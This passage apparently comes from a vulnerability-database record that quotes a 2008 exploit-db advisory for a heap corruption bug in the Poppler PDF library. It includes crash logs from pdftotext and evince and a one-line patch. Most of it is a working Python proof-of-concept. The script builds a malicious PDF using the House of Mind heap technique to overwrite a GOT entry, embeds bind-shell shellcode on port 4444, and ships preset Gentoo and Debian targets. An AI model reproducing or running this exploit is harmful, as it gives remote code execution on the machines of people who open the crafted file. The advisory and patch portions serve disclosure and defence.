functionality. In the\nPOC I have used repetidely the 'name' of the fields of a pdf dictionary\nto allocate memory. Each name allocates up to 127bytes and apparently\nthere is no limit in the number of fields. \n\n\nThe following excerpt is a sample verification of the existence of\nthe problem :\n\nlocalhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf \nlocalhost expl-poppler # pdftotext test.pdf \nError: PDF file is damaged - attempting to reconstruct xref table...\nError: Annotation rectangle is wrong type\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Page annotations object (page 3) is wrong type (integer)\nError: Page count in top-level pages object is incorrect\nError: Couldnt read page catalog\nTrace/breakpoint trap\n\n:)\n\n\nFurther research should be done to accomodate the heap for other applications like evince:\nlocalhost expl-poppler # evince test.pdf \n\n(evince:8912): GnomeUI-WARNING **: While connecting to session manager:\nAuthentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed.\n\n** (evince:8912): WARNING **: Service registration failed.\n\n** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.\nError: PDF file is damaged - attempting to reconstruct xref table...\nError: Annotation rectangle is wrong type\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Page annotations object (page 3) is wrong type (integer)\n*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 ***\n\nNote that 0x08100468 is still a provided pointer. But in this try some\nmalloc structure like _heap_info (see. house of mind) is not correctly\naligned any more. Maybe evince-thumbnailer which is (probably\nmonothreaded) is an easier target.\n\n\nPatch\n=====\n\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\nindex b28a3ee..72a706b 100644\n--- a/poppler/Page.cc\n+++ b/poppler/Page.cc\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) {\n \n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {\n Object tmp;\n-\t\n+ pageWidgets =\tNULL; //Security fix\n ok = gTrue;\n xref = xrefA;\n num = numA;\n\n\nPOC:\n===\n\nWritten in pyploit. It can be used 2 ways , one selecting a preconfigured\ntarget like *gentoo-pdftotext* or the other in which you could pass some\nmalloc/free execution trace moddifing parameters. \n\n'''\n\nimport struct\nimport struct\nimport math\nimport os\n\nimport sys\n\n## print \"%.400f\"%d wont work :( ... so a quick double printing class \nclass Doubles:\n def __init__(self, precision=400):\n self.precision=precision\n\n def pdficateint(self,i1,i2):\n s = struct.pack(\"@L\",i1) + struct.pack(\"@L\",i2)\n return self.pdficatestr(s)\n\n def pdficate(self,s):\n rslt = \" \"\n for pos in range (0,len(s)/8):\n rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+\" \" \n return rslt;\n\n def pdficatestr(self, s):\n d = struct.unpack(\"d\",s)[0]\n rslt=\" \"\n if(d<0.0):\n rslt+=\"-\"\n d=-d\n rslt+=\"%d.\"%int(math.floor(d))\n myd=math.floor(d)\n scale=0.1\n\tnines=0\n for p in range(1,self.precision):\n for i in range(1,10):\n\t if (myd+scale*i) > d:\n\t i-=1\n\t break\n if i==9:\n\t\tif nines>6:\n\t\t return rslt\n\t\telse:\n\t\t nines+=1\n\t else:\n\t\tnines=0\n rslt+=(\"%02d\"%i)[1]\n myd+=scale* i\n scale=scale*0.1\n\treturn rslt\n\n##From Malloc maleficarum\n##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt\nclass HouseOfMind:\n\n HEAP_MAX_SIZE=(1024*1024) \n JMP='\\xeb'\n NOP='\\x90'\n PAD='\\x00'\n PREV_INUSE=0x1\n IS_MMAPPED=0x2\n NON_MAIN_ARENA=0x4\n def __init__(self, base, where, payload, entrypoint):\n self.base=base\n self.where=where-0xc\n self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1)\n self.payload=payload\n self.entrypoint=entrypoint\n self.chunkaddress=0\n if (self.entrypoint > 0xff - 8):\n \tthrow \n \n## lendian, 32bit only\n## See The Malloc Maleficarum / House of Mind\n def mind(self):\n rslt = \"\"\n #first we add padding to reach the next Heap border\n rslt+=self.PAD*(self.heap_info-self.base)\n\n #now we add a _heap_info pinting to a malloc_state of our own\n #and dictating a generous size for this *heap*\t\n ##arena.c:59 //struct _heap_info\n rslt += struct.pack(\"<L\", self.heap_info + 16) # Arena for this heap.\n rslt += struct.pack(\"<L\", 0x0000000) # Previous heap. (BUG: Don't know what M does with this)\n rslt += struct.pack(\"<L\", 0x7000000) # Current size in bytes.\n rslt += struct.pack(\"<L\", 0x7000000) # Size in bytes that has been mprotected PROT_READ|PROT_WRITE\n #here arena.c suggest some padding. We just don't do it.\n\n\n #now we add the malloc_state of our own\n ##malloc.c:2317 //struct malloc_state\n rslt += struct.pack(\"<L\", 0x00000000)\t# mutex for serializing access * 0 -> unlocked.\n rslt += struct.pack(\"<L\", 0x000ffff)\t# Flags * We need NONCONTIGUOUS_BIT to be on for passing\n \t\t\t\t\t# condition on malloc.c:@@@@@\n\n #Note: We assume not Thread's stats#\n \n rslt += struct.pack(\"<L\", 0x00000000)*10 \t#Fastbins * We don use them.\n rslt += struct.pack(\"<L\", 0x00000000)\t\t#Base of the topmost chunk--not otherwise kept in a bin\n \t\t\t\t\t\t#We need it to be different to our chunk pointer for \n \t\t\t\t\t\t#passing condition on malloc.c:@@@@, 0 is safe enough\n rslt += struct.pack(\"<L\", 0x00000000)\t#The remainder from the most recent split of a small request\n\n #Here it come the bins\n ##The first one is the Unsorted bin! \n ##Free will write the *chunk* to the containing address +0xc; so it\n ##shout point to the GOT pointer to 'overload' -0xc\n rslt += struct.pack(\"<L\", self.where);\n \n rslt += struct.pack(\"<L\", 0x0000000)* 253\t#All the other unused bins go to 0 * ~\n rslt += struct.pack(\"<L\", 0x00000000)*4\t\t#Bitmap of bins\n\n rslt += struct.pack(\"<L\", 0x00000000)\t#Linked list next malloc_state\n \n ##Memory allocated from the system in this arena.\n rslt += struct.pack(\"<L\", 0x70000000)\t#system_mem * Need to be big enough for passing the\n \t\t\t\t\t#condition on malloc:@@@@\n rslt += struct.pack(\"<L\", 0x00000000)\t#max_system_mem ?? \n\n #needed for chunk aligment\n rslt += self.PAD*4\n\n#CHUNKS\n# An allocated chunk looks like this:\n#\n# chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Size of previous chunk, if allocated | |\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Size of chunk, in bytes |M|P|\n# mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | User data starts here... .\n# . .\n# . (malloc_usable_size() bytes) .\n# . |\n#nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Size of chunk |\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n\n #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa!\n# rslt += struct.pack(\"<L\", 16)\t#Size of previous chunk * UNUSED\n# rslt += struct.pack(\"<L\", 64) \t#Size of chunk, in bytes. No flags\n# rslt += self.PAD*(64-8)\n\n #chunk 1 THE CHAMP\n rslt += \"\\x40\"+self.JMP+struct.pack(\"B\",5+self.entrypoint)+self.PAD #Size of previous chunk *DOESN'T MATTER!\n rslt += struct.pack(\"<L\",8+len(self.payload)|self.PREV_INUSE|self.NON_MAIN_ARENA) # Size of this chunk\n \t\t\t\t\t\t\t\t #TODO: Explain flags, link code\n \n ##Save the chunk1 address \n self.chunkaddress= self.base + len(rslt)\n rslt += self.payload\t#payload (payload[entrypoint] should contain shellcode)!\n\n #chunk 2 THE LAST?\n rslt += struct.pack(\"<L\",8+len(self.payload))\t#Size of previous chunk\n \t\t\t\t\t\t#TODO: link where it is checked\n \n rslt += struct.pack(\"<L\",64|self.PREV_INUSE|self.NON_MAIN_ARENA) #Size of this chunk \n \t\t\t\t\t\t\t\t #Neds to be greater than 2 * SIZE_SZ,\n \t\t\t\t\t\t\t\t #TODO: Explain flags, link code\n\n rslt += self.PAD*(64-8)\n\n #chunk 3 THE LAST!\n rslt += struct.pack(\"<L\",64)\t\t#Size of previous chunk\n rslt += struct.pack(\"<L\",self.PREV_INUSE) #Size of this chunk * Here we need just the PREV_INUSE bit set\n return rslt\n #no need no payload\n\n#For constructing a minimal pdf file\nclass PDFObject:\n def __init__(self,toks):\n self.toks=toks\n self.n=0\n self.v=0\n \n def __str__(self):\n s=\"%d %d obj\\n\"%(self.n,self.v)\n for t in self.toks:\n s+=t.__str__()\n s+=\"\\nendobj\\n\" \n return s\n\n\nclass PDFDict():\n def __init__(self):\n self.dict = []\t\n\n def add(self,name,obj):\n self.dict.append((name,obj))\n\n def __str__(self):\n s=\"<<\"\n for name,obj in self.dict:\n s+=\"/%s %s\\n\"%(name,obj)\n s+=\">>\"\n return s\t\n\nclass PDFName():\n def __init__(self,s):\n self.s=s\n def __str__(self):\n return \"/%s\"%self.s\n\nclass PDFString():\n def __init__(self,s):\n self.s=s\n def __str__(self):\n return \"(%s)\"%self.s\n\nclass PDFRef():\n def __init__(self,obj):\n self.obj=obj\n def __str__(self):\n return \"%d %d R\"%(self.obj.n,self.obj.v)\n\n\nclass PDFDoc():\n def __init__(self):\n self.objs=[]\n \t\n def add(self,obj):\n obj.v=0\n obj.n=1+len(self.objs)\n self.objs.append(obj)\n\n def _header(self):\n return \"%PDF-1.5\\n\"\n \n def __str__(self):\n doc1 = \"%PDF-1.5\\n\"\n xref = {}\n for obj in self.objs:\n xref[obj.n] = len(doc1)\n doc1=doc1+obj.__str__()\n posxref=len(doc1)\n doc1+=\"xref\\n\"\n doc1+=\"0 %d\\n\"%len(self.objs)\n doc1+=\"0000000000 65535 f\\n\"\n for xr in xref.keys():\n doc1+= \"%010d %05d n\\n\"%(xref[xr],0)\n doc1+=\"trailer\\n\"\n trailer = PDFDict()\n trailer.add(\"Size\",len(self.objs))\n trailer.add(\"Root\",\"2 0 R\")\n doc1+=trailer.__str__()\n doc1+=\"\\nstartxref\\n%d\\n\"%posxref\t\n doc1+=\"%%EOF\\n\\n\" \t\n\n return doc1\n\n#The ... \"POC\"\nclass PopplerExpl:\n\n def __init__(self,shellcode):\n\tself.shellcode=shellcode\n self.d = Doubles()\n\n#this wraps the shellcode in an encoding supported by 'doubles'\n def wrap(self,scode,where):\n\twrapscode = '\\xb8' + struct.pack(\"<L\",where)+\"\\x90\"*3 \t#movl where, %eax;nop;nop;nop\n\tfor c in scode:\n\t wrapscode += \"\\xc6\\x00%c\\x40\"%c \t\t\t#movb $c, (%eax); inc %eax\n \tif (len(scode)%2!=0):\n\t wrapscode += \"\\xc6\\x00\\xcc\\x40\"\t\t \t#movb $0xcc, (%eax); inc %eax\n\twrapscode += \"\\xb8\" + struct.pack(\"<L\",where)+\"\\x90\"*3\t#movl where, %eax;nop;nop;nop\n\twrapscode += \"\\x50\\xc3\"\t\t\t\t\t#push %eax;ret\n\treturn wrapscode + '\\x00'*(1000-len(wrapscode))\t\t#padding to a supported size\n\n def make(self,base,got,massage=None):\n #here we generate the house of mind thingy\n\t#The House Of Mind instance.\n\t#Te first word es passed tu a gfree so we put 0 so we ignore that free.\n hm = HouseOfMind(base, got, \"\\x00\"*16+ self.wrap(self.shellcode,base), 16)\n mind = hm.mind()\n\n doc = PDFDoc()\n doc.add(PDFObject([\"<</Length 3>>\\nstream...\\nendstream\\n\"]))\n catalog = PDFDict()\n catalog.add(\"Type\", PDFName(\"Catalog\"))\n catalog.add(\"Outlines\", \"3 0 R\")\n catalog.add(\"Pages\", \"4 0 R\")\n catalog.add(\"AcroForm\", \"<</Fields [ 7 0 R ]>>\")\n\n #for i in range(0,1000):\n # catalog.add( \"C\"*82 + \"%05d\"%i, 0)\n\n outlines = PDFDict()\n outlines.add(\"Type\", PDFName(\"Outlines\"))\n outlines.add(\"Count\",0)\n\n pages = PDFDict()\n pages.add(\"Type\", PDFName(\"Pages\"))\n pages.add(\"Kids\",\"[ 8 0 R 6 0 R 5 0 R ]\")\n pages.add(\"Count\",\"3\")\n\n doc.add(PDFObject([catalog]))\n doc.add(PDFObject([outlines]))\n doc.add(PDFObject([pages]))\n\n page1 = PDFDict()\n page1.add(\"Type\", PDFName(\"Page\"))\n page1.add(\"Parent\", \"4 0 R\")\n page1.add(\"MediaBox\",\"[ 0 0 612 792 ]\")\n page1.add(\"Contents\", \"1 0 R\")\n page1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\")\n page1.add(\"Annots\", \"0\")\n \n\t#malloc-fill-free lots of chunks of the size then used by Page class(88) \n for pagesize in range(88,126):\n\t payload = (\"\".join([\"#%02x\"%ord(struct.pack(\"@L\",hm.chunkaddress)[i]) for i in range (0,4)]))*19\n\t payload += \"B\"*(pagesize-(len(payload)/3)) \n\t for i in range(0,10):\n \tpage1.add(payload, 0)\n\n doc.add(PDFObject([page1]))\n\n page1 = PDFDict()\n page1.add(\"Type\", PDFName(\"Page\"))\n page1.add(\"Parent\", \"4 0 R\")\n page1.add(\"MediaBox\",\"[ 0 0 612 792 ]\")\n page1.add(\"Contents\", \"1 0 R\")\n page1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\")\n page1.add(\"Annots\", \"[7 0 R 7 0 R 7 0 R 7 0 R]\")\n\n #massage session 1\n size=127\n for i in range(0,massage[0]):\n page1.add( \"A\"*(size-5)+(\"%05d\"%(i)), \"B\"*size)\n\n doc.add(PDFObject([page1]))\n annots = PDFDict()\n annots.add(\"Subtype\",\"/Text\")\n\n annots.add(\"BS\", \"<</D [ \"+\n\t\"0 \"*massage[1] + \n self.d.pdficate(mind)+\n #more massage>?\n \"0.0 \"*massage[2] + \" ]>>\")\n\n annots.add(\"FT\", \"/Tx\")\n doc.add(PDFObject([annots]))\n\n page1 = PDFDict()\n page1.add(\"Type\", PDFName(\"Page\"))\n page1.add(\"Parent\", \"4 0 R\")\n page1.add(\"MediaBox\",\"[ 0 0 612 792 ]\")\n page1.add(\"Contents\", \"1 0 R\")\n page1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\")\n page1.add(\"Annots\", \"[7 0 R]\")\n doc.add(PDFObject([page1]))\n doc.add(PDFObject([\"<<>>\"]))\n doc.add(PDFObject([\"[ /PDF ]\"]))\n return doc.__str__()\n\n\n##Main\n## Not every shellcode will work by now\n## Only the ones that taken by 8bytes form an ieee754 double presicion float\n## with an exponent not too positive ... :)\n\n## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com \nscode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\nscode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\nscode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\nscode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\nscode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\nscode += \"\\x89\\xe1\\xcd\\x80\"\n\n#expl = PopplerExpl( ('\\xcc'+'\\x90')*((160-16)/2))\nexpl = PopplerExpl(scode)\n\ntargets = {\n \"gentoo-pdftotext\":(0x08100000, 0x804c014, 1863, 20, 400),\n \"debian4-pdftotext\":(0x08100000, 0x804bb18, 1879, 33, 400),\n \"gentoo-evince-thumbnailer\": (0x8100000, 0x080712c4, 907, 34, 200),\n\n}\n\nif len( sys.argv )==1:\n print \"Comments -> fmanzano@fceia.unr.edu.ar\"\n print \"Usage 1:\"\n print \"\t%s \"%sys.argv[0], targets.keys()\n print \"Usage 2:\"\n print \"\t%s massage1 massage2 massage3 base got\"%sys.argv[0]\n print \"\tThe idea here is to align the _heap_info struct that commences with 0x08?00010 \"\n print \"\tto the address 0x8?0000. For this pourpose move massage1/2/3. \"\n print \"\tTHIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !\"\n print \"\tbase is the 1024*1024 bytes aligned address to which we are trying to align everything\" \n print \"\tgot is the addres of the got where the thing is going to write the shellcode address\"\n print \"\tBTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT\"\nelif len( sys.argv )>2:\n print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3])))\nelse:\n #base: the expected heap limit (08100000,08200000,....08f00000... )\n #got: address of the got entry to change \n #chinesse massage\n base,got,massage1,massage2,massage3 = targets[sys.argv[1]]\n print expl.make(base,got,(massage1,massage2,massage3))\n\n# milw0rm.com [2008-07-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6032/"}]}